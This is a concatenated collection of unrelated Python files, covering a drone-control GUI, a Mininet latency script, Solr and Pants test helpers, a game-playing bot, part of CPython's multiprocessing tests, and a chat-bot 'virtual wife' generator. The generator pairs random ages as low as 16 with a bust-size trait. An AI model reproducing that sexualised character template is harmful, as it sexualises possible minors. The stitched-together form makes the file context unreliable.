self.battery_indicate = tki.Label(textvariable=self.battery_str, width=15, anchor=tki.W, justify='left',
foreground='#ffffff', background='#000000', font=("",16))
self.battery_indicate.pack(fill="both", anchor=tki.W)
self.height_str = tki.StringVar()
self.height_str.set('Altitude : ')
self.height_indicate = tki.Label(textvariable=self.height_str, width=15, anchor=tki.W, justify='left',
foreground='#ffffff', background='#0000a0', font=("",16))
self.height_indicate.pack(fill="both", anchor=tki.W)
self.barcode_str = tki.StringVar()
self.barcode_str.set('')
self.barcode_indicate = tki.Label(textvariable=self.barcode_str, width=15, anchor=tki.W, justify='left',
foreground='#000000', background='#ffffff', font=("",16))
self.barcode_indicate.pack(fill="both", anchor=tki.W)
self.barcode_latest_str = ''
self.btn_landing = tki.Button(
self.root, text="Land", relief="raised", command=self.droneLanding)
self.btn_landing.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_takeoff = tki.Button(
self.root, text="Takeoff", relief="raised", command=self.droneTakeOff)
self.btn_takeoff.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_takeoff = tki.Button(
self.root, text="Auto pilot", relief="raised", command=self._autoPilot)
self.btn_takeoff.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.tmp_f = tki.Frame(self.root, width=100, height=2)
self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
self.tmp_f.pack(side="bottom")
self.tmp_f.focus_set()
self.hist_txt = tki.Text(self.root, height=16, width=40)
self.hist_txt.pack(side='bottom', fill='both', expand='yes', padx=10, pady=5)
self.root.wm_title("Drone UI")
self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)
self.video_thread_stop = threading.Event()
self.video_thread = threading.Thread(target=self._video_loop, args=())
self.video_thread.daemon = True
self.video_thread.start()
self.get_GUI_Image_thread_stop = threading.Event()
self.get_GUI_Image_thread = threading.Thread(target = self._getGUIImage)
self.get_GUI_Image_thread.daemon = True
self.get_GUI_Image_thread.start()
self.sending_command_thread_stop = threading.Event()
self.sending_command_thread = threading.Thread(target = self._sendingCommand)
self.sending_command_thread.daemon = True
self.sending_command_thread.start()
self._add_log('apli boot')
def _video_loop(self):
time.sleep(0.5)
while not self.video_thread_stop.is_set():
if hasattr(self.drone, 'read'):
self.frame_lock.acquire()
try:
self.frame = self.drone.read_video_frame()
except:
print('Err : caught a RuntimeError')
self.frame_lock.release()
time.sleep(0.011)
return
def _getGUIImage(self):
while not self.get_GUI_Image_thread_stop.is_set():
if hasattr(self.drone, 'read_video_frame'):
self.frame_lock.acquire()
try:
self.frame = self.drone.read_video_frame()
except:
print('Err : caught a RuntimeError')
self.frame_lock.release()
if self.frame is None or self.frame.size == 0:
continue
if self.frame.shape[1] != 960:
continue
if self.get_GUI_Image_thread_stop.is_set():
break
self.frame_lock.acquire()
self.drone_ar.renew_frame(self.frame, self.frame_no, self.now_height, self.ar_cmd, self.ar_val)
self.frame_no += 1
self.image = Image.fromarray(self.frame)
self.drone_ar.draw_txt(self.image, self.ar_cmd, self.ar_val)
self.frame_lock.release()
self.image = ImageTk.PhotoImage(self.image)
self.panel.configure(image=self.image)
self.panel.image = self.image
time.sleep(0.033)
return
def _sendingCommand(self):
poling_counter = 0
while not self.sending_command_thread_stop.is_set():
if self.takeoff and (poling_counter % 12) == 0 and self.auto_pilot: # and toggle == 0:
self.ar_cmd, self.ar_val = self.drone_ar.get_command()
if self.ar_cmd== 'up':
self.droneUp(self.ar_val)
elif self.ar_cmd == 'down':
self.droneDown(self.ar_val)
elif self.ar_cmd == 'forward':
self.droneMoveForward(self.ar_val)
elif self.ar_cmd == 'back':
self.droneMoveBackward(self.ar_val)
elif self.ar_cmd == 'left':
self.droneMoveLeft(self.ar_val)
elif self.ar_cmd == 'right':
self.droneMoveRight(self.ar_val)
elif self.ar_cmd == 'rotateLeft':
self.droneCCW(self.ar_val)
elif self.ar_cmd == 'rotateRight':
self.droneCW(self.ar_val)
elif self.ar_cmd == 'stay':
print('>> stay')
tmpstr = self.drone_ar.get_latest_barcode()
if self.barcode_latest_str != tmpstr:
self.barcode_latest_str = tmpstr
self.barcode_str.set(tmpstr)
self._add_log(tmpstr)
self.get_battery()
self.get_height()
poling_counter += 1
time.sleep(0.3)
return
def droneTakeOff(self):
takeoff_response = None
self.drone.set_speed(75)
time.sleep(0.2)
self.drone.takeoff()
time.sleep(0.2)
self.takeoff = True
return
def droneLanding(self):
self.takeoff = False
self.drone.land()
time.sleep(0.2)
return
def _autoPilot(self):
if self.auto_pilot:
self.ar_cmd = 'MANUAL'
self.auto_pilot = False
else:
self.auto_pilot = True
return
def droneCW(self, degree):
self.drone.rotate_cw(degree)
return
def droneCCW(self, degree):
self.drone.rotate_ccw(degree)
return
def droneMoveForward(self, distance):
self.drone.move_forward(distance)
return
def droneMoveBackward(self, distance):
self.drone.move_backward(distance)
return
def droneMoveLeft(self, distance):
self.drone.move_left(distance)
return
def droneMoveRight(self, distance):
self.drone.move_right(distance)
return
def droneUp(self, dist):
self.drone.move_up(dist)
return
def droneDown(self, dist):
self.drone.move_down(dist)
return
def on_keypress_w(self, event):
self.distance = 20
print('Up %d cm' % self.distance)
self.droneUp(self.distance)
return
def on_keypress_s(self, event):
self.distance = 20
print('Down %d cm' % self.distance)
self.droneDown(self.distance)
return
def on_keypress_a(self, event):
self.degree = 10
print('Rotate left %d degree' % self.degree)
self.droneCCW(self.degree)
return
def on_keypress_d(self, event):
self.degree = 10
print('Rotate right %d m' % self.degree)
self.droneCW(self.degree)
return
def on_keypress_up(self, event):
self.distance = 20
print('forward %d cm' % self.distance)
self.droneMoveForward(self.distance)
return
def on_keypress_down(self, event):
self.distance = 20
print('backward %d cm' % self.distance)
self.droneMoveBackward(self.distance)
return
def on_keypress_left(self, event):
self.distance = 20
print('left %d cm' % self.distance)
self.droneMoveLeft(self.distance)
return
def on_keypress_right(self, event):
self.distance = 20
print('right %d cm' % self.distance)
self.droneMoveRight(self.distance)
return
def on_keypress_enter(self, event):
if self.frame is not None:
self.registerFace()
self.tmp_f.focus_set()
return
def get_battery(self):
self.now_battery = int(self.drone.get_battery())
str_val = 'Battery : ' + str(self.now_battery) + ' [%]'
self.battery_str.set(str_val)
return
def get_height(self):
int_val = self.drone.get_height()
if int_val != 0:
int_val *=10
if abs(int_val - self.now_height) < 100:
self.now_height = int_val
str_val = 'Altitude : ' + str(self.now_height) + ' [cm]'
self.height_str.set(str_val)
return
def onClose(self):
print('closing 1...')
self.sending_command_thread_stop.set()
self.sending_command_thread.join(1)
if self.sending_command_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 2...')
self.video_thread_stop.set()
self.video_thread.join(1)
if self.video_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 3...')
self.get_GUI_Image_thread_stop.set()
self.get_GUI_Image_thread.join(1)
if self.get_GUI_Image_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 4...')
self.drone.close()
del self.drone
self.root.quit()
return
def _add_log(self, arg_log):
now = datetime.datetime.now(pytz.timezone(TIMEZONE))
nowtimestr = str(now.strftime('%X'))
logstr = nowtimestr + ' : [' + arg_log + ']\n'
self.hist_txt.insert(tki.END, logstr)
return
#eof
|
latry.py
|
import numpy as np
import os
import sys
from mininet.net import Mininet
import threading
from threading import Thread
import time
from datetime import datetime
h1 = net.get('h1')
h2 = net.get('h2')
h3 = net.get('h3')
h4 = net.get('h4')
h5 = net.get('h5')
h6 = net.get('h6')
stop = False
#latency_log = open("latlog.txt", "a")
h1_log = open("h1.txt", "a")
h2_log = open("h2.txt", "a")
h3_log = open("h3.txt", "a")
h4_log = open("h4.txt", "a")
h5_log = open("h5.txt", "a")
h6_log = open("h6.txt", "a")
def timer():
global h1_log
global h2_log
global h3_log
global h4_log
global h5_log
global h6_log
global stop
global threads
print "TIMER IS DONE"
stop = True
h1.cmd("pkill curl | killall curl")
h2.cmd("pkill curl | killall curl")
h3.cmd("pkill curl | killall curl")
h4.cmd("pkill curl | killall curl")
h5.cmd("pkill curl | killall curl")
h6.cmd("pkill curl | killall curl")
os.system("pkill curl")
h1_log.close()
h2_log.close()
h3_log.close()
h4_log.close()
h5_log.close()
h6_log.close()
for pr in threads:
pr.join()
sys.exit()
def h1_wget():
global h1
global stop
global np
global h1_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h1.cmd("curl -so /dev/null -w '%{time_total}\n' >> h1.txt 10.0.0.8:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h2_wget():
global h2
global stop
global np
global h2_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h2.cmd("curl -so /dev/null -w '%{time_total}\n' >> h2.txt 10.0.0.8:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h3_wget():
global h3
global stop
global np
global h3_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h3.cmd("curl -so /dev/null -w '%{time_total}\n' >> h3.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h4_wget():
global h4
global stop
global np
global h4_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h4.cmd("curl -so /dev/null -w '%{time_total}\n' >> h4.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
######
def h5_wget():
global h5
global stop
global np
global h5_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h5.cmd("curl -so /dev/null -w '%{time_total}\n' >> h5.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
####
def h6_wget():
global h6
global stop
global np
global h6_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h6.cmd("curl -so /dev/null -w '%{time_total}\n' >> h6.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
threads = []
t = threading.Timer(60, timer)
t.start()
h1_t = Thread(target = h1_wget)
h2_t = Thread(target = h2_wget)
h3_t = Thread(target = h3_wget)
#h4_t = Thread(target = h4_wget)
#h5_t = Thread(target = h5_wget)
#h6_t = Thread(target = h6_wget)
h1_t.start()
threads.append(h1_t)
h2_t.start()
threads.append(h2_t)
h3_t.start()
threads.append(h3_t)
#h4_t.start()
#threads.append(h4_t)
#h5_t.start()
#threads.append(h5_t)
#h6_t.start()
#threads.append(h6_t)
for pr in threads:
pr.join()
h1_log.close()
h2_log.close()
h3_log.close()
h4_log.close()
h5_log.close()
h6_log.close()
|
keep_online.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_online():
t = Thread(target=run)
t.start()
|
utils.py
|
from os.path import dirname, join
from httplib import HTTPConnection
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from StringIO import StringIO
from socket import error
from sys import stderr
from re import search
from collective.solr.local import getLocal, setLocal
from collective.solr import tests
try:
from zope.component.hooks import getSite, setSite
except ImportError:
from zope.app.component.hooks import getSite, setSite
try:
from Zope2.App import zcml
except ImportError:
from Products.Five import zcml
def loadZCMLString(string):
# Unset current site for Zope 2.13
saved = getSite()
setSite(None)
try:
zcml.load_string(string)
finally:
setSite(saved)
def getData(filename):
""" return a file object from the test data folder """
filename = join(dirname(tests.__file__), 'data', filename)
return open(filename, 'r').read()
def fakehttp(solrconn, *fakedata):
""" helper function to set up a fake http request on a SolrConnection """
class FakeOutput(list):
""" helper class to organize output from fake connections """
conn = solrconn
def log(self, item):
self.current.append(item)
def get(self, skip=0):
self[:] = self[skip:]
return ''.join(self.pop(0)).replace('\r', '')
def new(self):
self.current = []
self.append(self.current)
def __len__(self):
self.conn.flush() # send out all pending xml
return super(FakeOutput, self).__len__()
def __str__(self):
self.conn.flush() # send out all pending xml
if self:
return ''.join(self[0]).replace('\r', '')
else:
return ''
output = FakeOutput()
class FakeSocket(StringIO):
""" helper class to fake socket communication """
def sendall(self, str):
output.log(str)
def makefile(self, mode, name):
return self
def read(self, amt=None):
if self.closed:
return ''
return StringIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return ''
return StringIO.readline(self, length)
class FakeHTTPConnection(HTTPConnection):
""" helper class to fake a http connection object from httplib.py """
def __init__(self, host, *fakedata):
HTTPConnection.__init__(self, host)
self.fakedata = list(fakedata)
def putrequest(self, *args, **kw):
self.url = args[1]
response = self.fakedata.pop(0) # get first response
self.sock = FakeSocket(response) # and set up a fake socket
output.new() # as well as an output buffer
HTTPConnection.putrequest(self, *args, **kw)
def setTimeout(self, timeout):
pass
solrconn.conn = FakeHTTPConnection(solrconn.conn.host, *fakedata)
return output
def fakemore(solrconn, *fakedata):
""" helper function to add more fake http requests to a SolrConnection """
assert hasattr(solrconn.conn, 'fakedata') # `isinstance()` doesn't work?
solrconn.conn.fakedata.extend(fakedata)
def fakeServer(actions, port=55555):
""" helper to set up and activate a fake http server used for testing
purposes; <actions> must be a list of handler functions, which will
receive the base handler as their only argument and are used to
process the incoming requests in turn; returns a thread that should
be 'joined' when done """
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def do_GET(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def log_request(*args, **kw):
pass
def runner():
while actions:
server.handle_request()
server = HTTPServer(('', port), Handler)
thread = Thread(target=runner)
thread.start()
return thread
def pingSolr():
""" test if the solr server is available """
status = getLocal('solrStatus')
if status is not None:
return status
conn = HTTPConnection('localhost', 8983)
try:
conn.request('GET', '/solr/admin/ping')
response = conn.getresponse()
status = response.status == 200
msg = "INFO: solr return status '%s'" % response.status
except error, e:
status = False
msg = 'WARNING: solr tests could not be run: "%s".' % e
if not status:
print >> stderr
print >> stderr, '*' * len(msg)
print >> stderr, msg
print >> stderr, '*' * len(msg)
print >> stderr
setLocal('solrStatus', status)
return status
def numFound(result):
match = search(r'numFound="(\d+)"', result)
if match is not None:
match = int(match.group(1))
return match
|
bot.py
|
import pyautogui
import time
from tkinter import *
import threading
#project code dala3
#zone where take to screenshot to detect the cactus
detectionZone = (476,176, 20, 150)
#enable variable for the loop
BotEnable = False
exitLoop = False
def levelFilter(x):
return 255 if x > 126 else 0
def checkLoop():
global detectionRectangle
global w
while not exitLoop:
if BotEnable :
w.itemconfig(detectionRectangle, outline="white")
s = pyautogui.screenshot(region=detectionZone)
signature = sum(map(levelFilter, s.convert('L').getdata()))
if signature < 500135 :
w.itemconfig(detectionRectangle, outline="red")
print('jump')
print(signature)
pyautogui.keyDown("space")
time.sleep(0.1)
pyautogui.keyUp("space")
return
x = threading.Thread(target=checkLoop)
x.start()
BotWindow = Tk()
BotWindow.wm_attributes('-alpha',0.2)
w = Canvas(BotWindow, width=200, height=150)
w.pack()
detectionRectangle = w.create_rectangle(47, 22, 23, 103, fill="blue",outline="white", width=3)
def click():
global detectionZone
detectionZone = (BotWindow.winfo_x()+30, BotWindow.winfo_y()+25,20,100)
def toggleEnable():
global BotEnable
BotEnable = not BotEnable
enbBtn['bg']="green" if BotEnable else "red"
w.itemconfig(detectionRectangle, fill="white") if BotEnable else w.itemconfig(detectionRectangle, fill="blue")
def onClose():
global exitLoop
BotWindow.destroy()
exitLoop = True
posBtn = Button(BotWindow,text="Update position", command=click)
enbBtn = Button(BotWindow, text='Toggle',command=toggleEnable)
posBtn.pack()
enbBtn.pack()
BotWindow.protocol("WM_DELETE_WINDOW", onClose)
BotWindow.wm_attributes("-topmost", 1)
BotWindow.mainloop()
|
test_run_tracker.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import http.server
import json
import threading
from builtins import open
from future.moves.urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode('utf-8'))
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
self.assertTrue(RunTracker.write_stats_to_json(file_name, stats))
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
WifeClass.py
|
import string
import linecache
import random
import sched
import threading
import time
import chardet
import nonebot
import requests
from zhon.hanzi import punctuation
from bot_plugins.Get_girl.random_config_index import *
GOD = 1149558764
LoveTalkList = list()
YanDereList = list()
MarryTalkList = list()
# 老公类,用于绑定用户账号和计算渣男值
class husband:
def __init__(self, ID: str):
self.ID = ID
self.FuckingBoy = 0
def getClass(self):
return self
# 判断这个用户是不是渣男
def isFuckingBoy(self) -> bool:
return True if self.FuckingBoy > 20 else False
def Random(tuple: ()):
return random.randint(0, len(tuple) - 1)
def WifeHair(HairColor: str, HairShape) -> str:
return HairColor + HairShape
@nonebot.scheduler.scheduled_job(
'cron',
second=6
)
def getLoveTalk():
threading.Thread(target=_getLove()).start()
def _getLove():
url = "https://chp.shadiao.app/api.php"
data = str(requests.get(url, timeout=3).text).encode('gbk').decode('gbk')
if data in LoveTalkList:
return
with open('love.txt', 'a') as f:
f.write(data + '\n')
f.close()
LoveTalkList.append(data)
# 老婆生成类
def is_rightful(word: str): # 判断是不是阳间文字
for ch in word:
if not ('\u4e00' <= ch <= '\u9fff' or 'a' <= ch <= 'z' or 'A' <= ch <= 'Z'):
return False
return True
stri = 'today is friday, so happy..!!!'
def deletePunctuation(stri: str) -> str: # 去除标点符号
stri = stri.replace(' ', '').replace('\n', '')
punctuation_string = string.punctuation
for i in punctuation_string:
stri = stri.replace(i, '')
for i in punctuation:
stri = stri.replace(i, '')
return stri
class WifeObj:
def getMarry(self) -> str:
if self.liking > 999 and not self.isMerry:
self.isMerry = True
elif self.isMerry:
return '我们已经结婚了哦'
return MarriageVow[Random(MarriageVow)] if self.liking > 999 else '你太着急了,让我们再培养培养感情吧'
def getDict(self) -> dict:
return {
'name': self.name,
'age': self.age,
'husband': self.husband.ID,
'ouBai': self.ouBai,
'height': self.height,
'weight': self.weight,
'character': self.Character,
'bud': self.bud,
'isMerry': self.isMerry,
'liking': self.liking,
'work': self.work,
'race': self.race,
'WifeNickName': self.WifeNickName,
'HusbandNickName': self.HusbandNickName,
'hair': self.Hair,
'eyesColor': self.eyesColor
}
def setNickName(self, NickName: str, isWife: bool): # 更新老婆昵称
NickName = deletePunctuation(NickName) # 去除文本标点符号
if NickName in BanTalkMember: # 判断文本是否在违禁词范围内
self.liking -= 2 # 好感度-2
return '滚'
if NickName in self.banNickName: # 问过了老婆要不要这个昵称并且拒绝过一次了
return '我都说了我不要这个名字'
if len(NickName) <= 1:
return '?' # 昵称为空
if random.randint(0, self.liking) < 30 or not is_rightful(NickName) or len(NickName) >= 6:
# 好感度大于30概率接受你对她的称呼,并且该称呼合法
self.banNickName.append(NickName)
return '好难听的名字,我不要'
if isWife:
self.WifeNickName = NickName
return f'好'
else:
self.HusbandNickName = NickName
return f'好的{self.HusbandNickName}'
def __init__(self, thisHusband: husband):
self.husband = thisHusband # 绑定husband对象
self.WifeNickName = '老婆' # 你叫女朋友为‘老婆’
self.HusbandNickName = "老公" # 女朋友叫你,默认为老公
self.eyesColor = Color[Random(Color)] # 瞳色
self.banNickName = list()
self.work = work[Random(work)] # 老婆的职业
self.Hair = Color[Random(Color)] + Hair[Random(Hair)] # 发型样式
self.race = race[Random(race)] # 种族
self.name = surname[Random(surname)] + name[Random(name)] # 姓名
self.ouBai = ouBaiSize[Random(ouBaiSize)]
self.Character = Character[Random(Character)]
self.age = random.randint(16, 24)
self.height = str(random.randint(150, 170) if self.race !=
'矮人' else random.randint(120, 140))
self.weight = str(random.randint(40, 60))
self.bud = Bud[Random(Bud)]
self.liking = random.randint(0, 30)
self.isMerry = False
self.isTalk = False
self.scence = None
self.isMaxTalkNum = False
# 最后把生成的对象添加到字典中
def addInWifeDict(self):
WifeDict[self.name] = self
def getHusbandId(self) -> str:
return self.husband.ID
def getLoveScence(self) -> object:
if self.isMaxTalkNum:
self.liking -= 20 if self.liking > -100 else WifeDict.pop(self)
if self.liking <= -100:
return '你真的很烦,再见!'
return '你烦不烦,做你自己的事情去'
data = getScence(self) if self.scence is None else self.scence
self.scence = getScence(self)
self.isMaxTalkNum = True
threading.Thread(target=self.Delay).start()
return data.replace('你', self.HusbandNickName)
def BanUser(self):
self.isMaxTalkNum = False
def Delay(self): # 限制访问频率
s = sched.scheduler(time.time, time.sleep)
s.enter(10, 1, self.BanUser)
s.run()
def couples(self) -> str:
WifeDict.pop(self.name)
return f'{self.name}:{Couples[self.Character]}'
def WifeIndex(self) -> str:
return f'{self.name}\n' \
f'性格:{self.Character}\n' \
f'种族:{self.race}\n' \
f'职业:{self.work}\n' \
f'特点:{self.bud}\n' \
f'头发:{self.Hair}\n' \
f'瞳色:{self.eyesColor}\n' \
f'胸围:{self.ouBai}\n' \
f'身高:{self.height}cm\n' \
f'体重:{self.weight}kg\n' \
f'当前好感度:{self.liking}\n'
WifeDict = dict()
def getScence(self: WifeObj) -> str:
if self.Character == '病娇':
return YanDereList[random.randint(0, len(YanDereList) - 1)].replace('\n', '')
if self.isMerry == True:
return MarryTalkList[random.randint(0, len(MarryTalkList) - 1)].replace('\n', '')
data = LoveTalkList[random.randint(0, len(LoveTalkList) - 1)]
return data.replace('\n', '')
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
